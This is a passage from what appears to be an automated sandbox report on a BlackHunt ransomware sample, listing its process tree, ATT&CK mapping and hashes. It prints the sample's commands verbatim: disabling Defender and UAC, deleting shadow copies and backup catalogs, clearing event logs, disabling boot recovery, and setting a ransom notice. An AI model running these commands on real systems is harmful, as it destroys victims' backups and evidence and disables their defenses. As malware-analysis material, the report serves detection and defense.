b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 52 PID 2228 wrote to memory of 2608 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 52 PID 2228 wrote to memory of 2608 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 52 PID 2228 wrote to memory of 2732 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 55 PID 2228 wrote to memory of 2732 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 55 PID 2228 wrote to memory of 2732 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 55 PID 2228 wrote to memory of 2732 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 55 PID 2880 wrote to memory of 1796 2880 cmd.exe 57 PID 2880 wrote to memory of 1796 2880 cmd.exe 57 PID 2880 wrote to memory of 1796 2880 cmd.exe 57 PID 2228 wrote to memory of 2348 2228 b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe 56 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe"C:\Users\Admin\AppData\Local\Temp\b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2228 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2308
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2916
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2872
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2428
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2176
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2956
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2100
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3060
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2396
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1060
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2000
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1968
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1956
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2024
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1764
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2712
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1040
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1696
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe" /F2⤵PID:1692
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe" /F3⤵
- Creates scheduled task(s)
PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2832
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2080
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:324
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1068
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2556
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2424
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:840
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:412
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1552
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1820
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1632
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:3996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2284
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:4032
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2068
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1292
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1664
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:4028
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3820
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1936
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2908
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3936
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1448
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2904
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3528
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:4040
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1584
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1316
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1036
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:944
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1388
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3780
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:4056
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\b62cdb3da164b91a5f50f60b52b2abce39a602d5f449bf66b0a78fd2472fda3c.exe"2⤵
- Deletes itself
PID:392 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2492
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3172
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3888
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3576
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5651db9945dcdd1584ef154541b7525d5
SHA129e65f26b7e525f018eb3dc75b711c938c23684e
SHA2569b6a9a13a0ae6fbb5a7ab65455b290b1cf6d7b0bd88f75886fef0e5ba26fe8f7
SHA512ccb69f0300a07da3ff6022f91dd9708c67430dcee7225409f4e2ad23472962b71460c6fb8ea001f4bbb5cd7bc0e2eb67990190838b60a70670d81bb64ad5adc6
-
Filesize
12KB
MD53476638b9b4000862808162b58bb306c
SHA16fef7b926e3cf14b05221e824207478909ffeb84
SHA2564035619eced77690c899f382286b37e35509301488f7cab6769c809ee11f2afe
SHA5125eb637b4346d5828833fe7e1befca1d3d185e7daf8b5901ef5dd55d538512dbf39bccee6a40e869bb71dce3636bcf47a2fb695fe01eb2f5cde53fb078155617a
-
Filesize
684B
MD54d3ad2ffcd671c918c1b31143c75e6db
SHA1d631c4ef5d7aa0c8184f097a73f12fe107cd7341
SHA256156dfb6dccb63c5665adcd146dfb5968806fb172b0322870c933e88c3d439918
SHA512480f488cea919de635a9d9c9e88d2d32491281e2cdde90538883557a188d41bf8e401545977aceace7ae4961eb1afb4ce562629bb4c62f3564f5e0a174b05c6d